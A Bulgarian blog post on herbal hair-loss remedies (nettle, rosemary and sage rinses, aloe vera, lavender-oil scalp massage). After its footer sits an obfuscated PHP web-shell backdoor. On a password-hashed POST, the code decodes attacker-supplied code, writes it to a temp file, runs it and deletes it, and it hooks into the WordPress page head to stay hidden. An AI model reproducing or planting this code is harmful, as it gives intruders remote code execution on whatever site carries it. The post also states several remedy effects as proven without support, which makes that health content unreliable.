Косопад и натурално лечение | Косопад

Натурални рецепти против косопад

На света навярно не съществува начин за 100 % отстраняване на косопад, но все пак има някои методи, които работят при голяма част от засегнатите.

маска с алое вера при косопад

Маска с алое вера при косопад

Лечение на косопад с коприва

Копривата е богата на витамини А и С, съдържа в себе си основни минерали и липиди. Това я прави особено полезна за косата, независимо дали се използва външно за изплакване или вътрешно под формата на чай. Тази уникална билка има способността да стопира действието на ензима 5 – алфа редуктаза, който именно превръща тестостерона в дихидротестостерон и причинява запушване на фоликулите.

Розмарин и градински чай

Тези две билки се използват в нетрадиционното лечение на косопад от векове. Третира се чрез втриване в корените, която трябва да е добре измита преди процедурата. Предполага се, че стимулират корена на косъма, правейки косата гъста и бухнала.

Приготвя се отвара от розмарин, градински чай, коприва и репей, която се вари в продължение на около 15 минути. Изплаквайте косата с течността поне един път на ден в продължение на три месеца.

kosopad-aloe-vera

Aloe vera pri kosopad

Алое Вера при косопад

Алое Вера е използвана като целебно средство при косопад още от американските индианци. Тази билка е отлично средство за предотвратяване загубата на коса, а положителните ѝ ефекти са много добре известни на науката. Алое Вера спомага скалпа, тъй като има свойството да балансира нивото на рН и да почиства порите.

Особено популярна рецепта при косопад в Новия свят е смесването на отвара от Алое Вера с малко масло от пшеничен зародиш и кокосово мляко, което се е използвало като натурален шампоан.

Масаж и ароматерапия

Тези две популярни техники често се използват с известен успех. Помагат основно при по – леките случаи на косопад, когато е достатъчно да „събудим” космения фоликул и да го накараме да работи усърдно, предизвиквайки по – голям приток на кръв и кислород към скалпа.

Съчетанието на шест капки масло от лавандула със същото количество бадемово, соево или сусамово масло, може да свърши прекрасна работа. След като се втрие нежно в корените, трябва да се остави около тридесет минути. После измийте косата с обикновен шампоан, към който прибавете нови три капки етерично масло.

22. април 2013 04:00:20 от Косопад
Категории: Рецепти при косопад | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}